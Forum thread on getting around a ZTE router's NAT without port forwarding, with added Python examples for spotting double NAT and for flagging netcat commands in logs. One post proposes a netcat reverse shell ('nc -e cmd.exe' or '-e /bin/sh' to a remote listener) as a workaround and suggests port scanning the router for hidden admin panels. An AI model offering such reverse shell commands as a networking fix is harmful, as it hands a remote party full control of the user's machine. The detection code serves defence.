Router problem


Black-Assassin

If you can't port forward, what are the things you need to access behind this router of yours? There are other ways around NAT, but it depends on what programs you are using and how you set them up, such as tunneling and VPNs or third-party redirectors.

Pretty much every router made in the past 15 years supports port forwarding. The issue you may be having is that whoever is your ISP may be sub-NATing you. Say you pay an apartment complex for internet; they could have you on a NAT as well, which would add a layer of firewall and prevent any external internet communications from reaching your router where you have port forwarding enabled.
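
A way to test the upstream-NAT theory from the post above, as an added example that is not part of the original thread: compare the WAN address shown on the router's status page with the address an outside service sees. The function name, verdict labels and sample addresses are constructed for illustration.

```python
import ipaddress

# Blocks that are never reachable from the public internet.
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
CGNAT = ipaddress.ip_network("100.64.0.0/10")  # RFC 6598 shared address space

ADVICE = {
    "direct": "Router holds the public address; a port forward on it is enough.",
    "double-nat": "Router sits behind another private network (building or "
                  "ISP gateway); that upstream device must forward the port too.",
    "cgnat": "ISP carrier-grade NAT; a forward on your router alone cannot "
             "work, so use an outbound tunnel or VPN, or ask for a public address.",
    "upstream-nat": "WAN address is public but not the one the internet sees; "
                    "something upstream is translating traffic.",
}

def classify_wan(router_wan_ip, observed_public_ip):
    """Compare the router's WAN address with the address seen from outside."""
    wan = ipaddress.ip_address(router_wan_ip)
    seen = ipaddress.ip_address(observed_public_ip)
    if wan in CGNAT:
        return "cgnat"
    if any(wan in net for net in RFC1918):
        return "double-nat"
    if wan != seen:
        return "upstream-nat"
    return "direct"

if __name__ == "__main__":
    # Constructed sample values (documentation address ranges), not real hosts.
    for wan, seen in [("203.0.113.7", "203.0.113.7"),
                      ("192.168.1.50", "203.0.113.7"),
                      ("100.72.14.9", "203.0.113.7")]:
        verdict = classify_wan(wan, seen)
        print(f"WAN {wan:<14} seen as {seen:<12} -> {verdict}: {ADVICE[verdict]}")
```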

Looking at some screenshots of ONLY ZTE brands, they look more like locked-down ISP devices that don't give home users much to access and configure. Depending on which one the OP has, there may not actually be functionality to configure the options needed, as Mr-Protocol mentioned, from the user side alone. The ISP probably has a separate admin login and interface on another port, though, that I would think lets them do more than the home users can, which may be where he can access the router from and make changes. If he can port scan his router from the outside and inside network, he may find an open port for an additional admin panel with more options (but also need the login creds), which I've seen on things like my own IP camera that has more than one admin panel: a lower-level viewing panel, and a higher-level configuration panel for administration of the camera.

In the meantime, I'd say work around it and do something like a reverse shell type setup: just feed whatever app or service you want to the internet-based node you want to give access to with something like netcat and point it at the location you want it to be able to be reached by, passing the inside network to the outside world and whatever service/program you want to access directly to a defined IP on the outside. Not safe by any means, but a solution that may work nonetheless.

Example:

"Home Machine" > router > internet > "destination node" that you want to connect back to the "Home Machine". In this sense, you don't port forward so the router allows someone on the outside to call in to the "Home Machine". Instead, you make the "Home Machine" call the "destination node" directly and pass whatever service you want to it.

If this is a gaming server/service you want to open port forwarding for, you may be able to just pass the executable directly to the game servers. In any manner, start a listener on your "destination node" and on your "Home Machine" pass the executable to the "destination node" much in the same way you would a file transfer, and it should grant you access. Just don't redirect the listening node to a file output, and make it listen on a service port the home machine expects its destination to listen on.

i.e., reverse shell example:

"destination node": nc -lvp 1234 -k where 1234 is the port we'll listen on for our connecting "Home Machine", and with -k, if the "Home Machine" drops a connection, it will leave a listener open for later if it needs to connect back again, and again, and again.

"Home Machine": nc -e cmd.exe 127.0.0.1 1234 where -e passes our executable, in this case cmd.exe (very dangerous since we're giving someone shell on the listening end, but used as an example in this scenario for illustration purposes), and 127.0.0.1 is the IP of our listening "destination node" outside the home network. In this case, we are calling them and passing them whatever executable we want, here a command prompt/shell from Windows. The same could be done in Linux with "-e /bin/sh".

I don't know for certain this would work with a game and gaming servers, but I imagine you could use an internal firewall rule to redirect the game, once started, to the netcat port to then send data out of the internal network (in theory). This would mean the "destination node" wants certain data, i.e., the game's established handshake, but can't listen back inside since the port isn't open on the router, but if we initiate the connection and leave a pipe open for it, it may work to keep the connection alive. That said, I don't know if the gaming servers will work in the same way handing over a shell would. We'll want to redirect with a combination of firewall rules on the "Home Machine" to forward internally all traffic the game talks on to the port netcat is sending data on (which would probably need to be a different port than the normally open one the game sends and listens on, since netcat will not be able to use the same socket/port already in use by another service or program). A lot of games these days don't need port forwarding to work, though, since they do what things like TeamViewer do and initiate 3rd-party servers for the routing: the node/game/service calls the 3rd party, they listen, then pass on info to the end game server/service, and all traffic passes through the third party to keep the connection alive. Steam clients and EA's Origin game clients do much of this in the same way, making it so home users don't have to open ports on their routers to work. Depending on what you want to access, we may be able to come up with a better solution to work around NAT, but I'm just trying to illustrate one use case example where you can dial out of the inside network to work around NAT in an instance when you can't call home from the outside world due to NAT restrictions.
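
How a defender might spot the two netcat invocations from the post above in process-creation logs, as an added example that is not part of the original thread. The log lines are constructed, and the set of no-argument flags is an assumption about common netcat builds.

```python
import re

NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.exe", "ncat.exe", "netcat.exe"}
NO_ARG_FLAGS = set("lvknzu")   # assumption: short flags that take no argument

def inspect(cmdline):
    """Return what a netcat command line asks for, or None if it is not netcat."""
    argv = [a.strip('"') for a in cmdline.split()]
    if not argv or re.split(r"[\\/]", argv[0])[-1].lower() not in NETCAT_NAMES:
        return None
    found = {"exec": None, "listen": False, "keep_open": False}
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg.startswith("-") and not arg.startswith("--"):
            for pos, ch in enumerate(arg[1:], start=1):  # walk clusters like -lvp
                if ch == "e":   # -e PROG: program wired to the socket
                    rest = arg[pos + 1:]
                    found["exec"] = rest or " ".join(argv[i + 1:i + 2])
                    break
                if ch == "l":
                    found["listen"] = True
                elif ch == "k":
                    found["keep_open"] = True
                elif ch not in NO_ARG_FLAGS:
                    break       # flag takes a value; rest of the token is data
        i += 1
    return found

def severity(found):
    if found["exec"]:
        return "high"      # a shell or program is handed to the remote end
    if found["listen"] and found["keep_open"]:
        return "medium"    # persistent listener waiting for call-backs
    return "low"

def triage(cmdlines):
    return [(severity(f), c) for c in cmdlines if (f := inspect(c))]

# Constructed process command lines, as process-creation logging would record them.
SAMPLE = [
    "nc -lvp 1234 -k",
    "nc -e cmd.exe 127.0.0.1 1234",
    r"C:\Tools\nc.exe -nve cmd.exe 127.0.0.1 1234",
    "/usr/bin/nc -zv 192.168.1.1 80",
    "notepad.exe notes.txt",
]
```

`triage(SAMPLE)` rates the `-e` lines high and the `-k` listener medium; pairing a high finding with an outbound connection from the same host is the signal worth alerting on.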
